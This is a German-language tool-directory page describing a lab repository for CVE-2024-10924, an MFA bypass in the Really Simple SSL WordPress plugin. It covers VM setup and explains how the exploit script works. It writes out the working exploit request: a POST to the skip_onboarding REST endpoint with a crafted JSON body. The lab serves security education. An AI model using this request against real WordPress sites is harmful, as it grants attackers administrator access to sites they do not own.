Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-10924-Bypass-MFA-Wordpress-LAB — Lab-Umgebung und Exploit-Skript für CVE-2024-10924, das die Umgehung der MFA in WordPress über den skip_onboarding-Endpunkt des Really Simple SSL-Plugins demonstriert. | Kitploit
Tools/GitHubGitHub/d1se0/cve-2024-10924-bypass-mfa-wordpress-lab
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsAuthentifizierungLernen & BildungLabs & Praxis
GitHub
d1se0/cve-2024-10924-bypass-mfa-wordpress-lab

CVE-2024-10924-Bypass-MFA-Wordpress-LAB

Lab-Umgebung und Exploit-Skript für CVE-2024-10924, das die Umgehung der MFA in WordPress über den skip_onboarding-Endpunkt des Really Simple SSL-Plugins demonstriert.

Repository anzeigen
41vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-10924 Bypass-MFA-WordPress - Exploit-Lab

Dieses Repository stellt ein Labor zum Ausnutzen der CVE-2024-10924-Schwachstelle in WordPress bereit, insbesondere um die two-factor authentication (MFA) zu umgehen und Zugriff auf das WordPress-Administrationspanel zu erhalten.

Voraussetzungen

Um dieses Labor in Ihrer Umgebung bereitzustellen, führen Sie die folgenden Schritte aus:

WordPress auf VMware bereitstellen

Sie müssen das zip des LAB entpacken. Gehen Sie in VMware auf Open, um eine Maschine zu importieren. Wir wählen die Datei aus, und schließlich klicken wir auf , um die verwundbare Maschine einzuschalten.

Ubuntu-Bypass-MFA-Wordpress.vmx
Power

LAB herunterladen

Kali Linux konfigurieren

Installieren Sie auf Ihrer Kali-Maschine die erforderlichen Tools und stellen Sie sicher, dass die folgenden Anwendungen installiert sind:

  • nmap: Zum Durchführen von Netzwerkscans.
  • requests: Zum Erstellen von HTTP-Anfragen (falls nicht vorhanden, installieren Sie requests mit pip install requests).
  • rich: Für eine elegante Konsolenausgabe (installieren mit pip install rich).

IP der WordPress-Maschine ermitteln

Um die IP der WordPress-Maschine in der Netzwerkumgebung zu ermitteln, führen Sie das folgende Skript von Ihrer Kali-Maschine aus:

root@kitploit:~
$ python3 knowIPwordpress.py
root@kitploit:~
This script does the following:

Detect your local IP. Scans the corresponding network segment to find active IPs. Perform a port scan for HTTP services. Check that the WordPress machine's IP has the title "Bypass-MFA" in its HTTP service. Once found, it will show you the URL where you can access the WordPress administration panel:

root@kitploit:~
Accede a WordPress en: http://<IP>/wp-admin

Bypass der Doppelprüfung (MFA):

Zugangsdaten Wordpress:

root@kitploit:~
admin:admin

Wenn Sie versuchen, sich bei WordPress anzumelden, werden Sie zur two-factor verification (MFA) aufgefordert. Um diesen Schritt zu umgehen, führen Sie das folgende Skript auf Ihrer Kali-Maschine aus:

root@kitploit:~
$ python3 bypass-MFA-Wordpress.py

So funktioniert das Skript bypass-MFA-Wordpress.py Dieses Skript nutzt die CVE-2024-10924-Schwachstelle aus und umgeht die Doppelverifizierung, um Zugriff auf das WordPress-Administrationspanel zu erhalten.

Skriptablauf:

Sitzungscookie abrufen: Das Skript sendet eine HTTP-Anfrage an den Endpunkt reallysimplessl/v1/two_fa/skip_onboarding, um ein gültiges Sitzungscookie zu erhalten.

Die Anfrage wird mit den folgenden Informationen gesendet:

root@kitploit:~
{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}

Anmeldeanfrage:

Sobald das Cookie erhalten wurde, fragt das Skript den WordPress-Benutzernamen und das Passwort ab. Anschließend sendet es eine POST-Anfrage an den Endpunkt wp-admin/profile.php mit den angegebenen Anmeldedaten, um sich anzumelden.

Erzeugung einer HTML-Datei:

Wenn der Bypass erfolgreich ist, speichert das Skript die Antwort des Administrator-Dashboards in einer .html-Datei und öffnet sie in Ihrem Standardbrowser.

Sie haben jetzt Zugriff auf das WordPress-Administrationspanel!

Manueller Weg Bypass-MFA-Wordpress:

Wenn Sie dies manuell mit BurpSuite tun möchten und wir den Endpoint kennen möchten, an den wir die Anfrage senden müssen, um die Cookies zu erfassen, können wir dies auf folgende Weise tun:

root@kitploit:~
$ python3 endpointWordpress.py

Dies zeigt uns den Code, den wir in BurpSuite einfügen müssen, um die Cookies erfassen zu können, in meinem Fall würde es ungefähr so aussehen:

root@kitploit:~
POST http://192.168.5.192/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: 192.168.5.192
Content-Type: application/json
Content-Length: 89
Connection: keep-alive

{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}

Manuelle Technik als Video:

https://github.com/user-attachments/assets/e70789d1-4fe4-46b4-81ef-76229dd265ce

Weitere Informationen in meinem YT-Video:

LINK = Video CVE-2024-10924-Bypass-MFA-Wordpress-LAB

Tool herunterladen